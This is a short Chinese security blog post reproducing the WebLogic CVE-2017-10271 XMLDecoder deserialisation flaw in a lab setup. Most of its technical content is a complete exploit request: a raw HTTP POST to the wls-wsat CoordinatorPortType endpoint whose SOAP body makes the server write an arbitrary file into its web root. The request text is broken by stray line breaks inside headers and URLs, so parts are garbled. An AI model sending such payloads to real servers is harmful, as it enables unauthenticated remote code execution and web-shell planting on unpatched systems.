Weblogic(CVE-2017-10271)漏洞复现 

阿城's Blog - 关注网络安全 黑客技术爱好者-阿城's Blog是一个关注网络安全,热爱黑客技术,分享各种技术教程资讯 —关注交流|web安全|漏洞发布|网络攻防|信息安全|网站建设



Weblogic(CVE-2017-10271)漏洞复现

2017-12-26 17:24 作者:阿城 | 渗透测试 |


漏洞复现

测试环境:windows 2003   

   weblogic 10.3.6.0版本  

               jdk 6.0


WebLogic安装和配置:http://www.360doc.com/content/15/

0918/15/21514996_499925417.shtml


启动服务之后访问页面:http://域名:默认weblogic端口/wls-wsat/CoordinatorPortType


如果存在以下内容则说明可能存在漏洞


1514294153756.jpg


开启burp访问此页面时,抓包,发送到Repeater模块


EXP如下:

POST //wls-wsat/CoordinatorPortType HTTP/1.0Host: http://192.168.174.130:7001/Accept: */*Upgrade-Insec

ure-Requests: 1Content-Type: text/xmlAccept-Langua

ge: zh-cnUA-CPU: x86Proxy-Connection: Keep-AliveU

ser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wind

ows NT 5.2; SV1; .NET CLR 1.1.4322)Pragma: no-cacheContent-Length: 553 <soapenv:Envelope xmlns:soapenv="http://schemas.xm

lsoap.orgsoap/e

nvelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/

soap/workarea/"><java><java version

="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_

WL_internal/wls-wsat/54p17w/war/2.txt</string><void method="println"><string>Weblogic By:www.ac166.cn</string></vo

id><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>


直接点击go,上传成功后地址为:http://192.168.174.130:7001/wls-wsat/2.txt


1514294153513.jpg


1514294153187.jpg


weblogic默认端口:7001

默认路径:servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/2.txt


文章作者:阿城
文章地址:http://www.ac166.cn/post-174.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

 

仅供学习与交流,遵循法律法规 & 如有侵犯您的版权请联系我删除 & 手机版

CopyRight © 2016 阿城's Blog - 关注网络安全 黑客技术爱好者.  All rights reserved.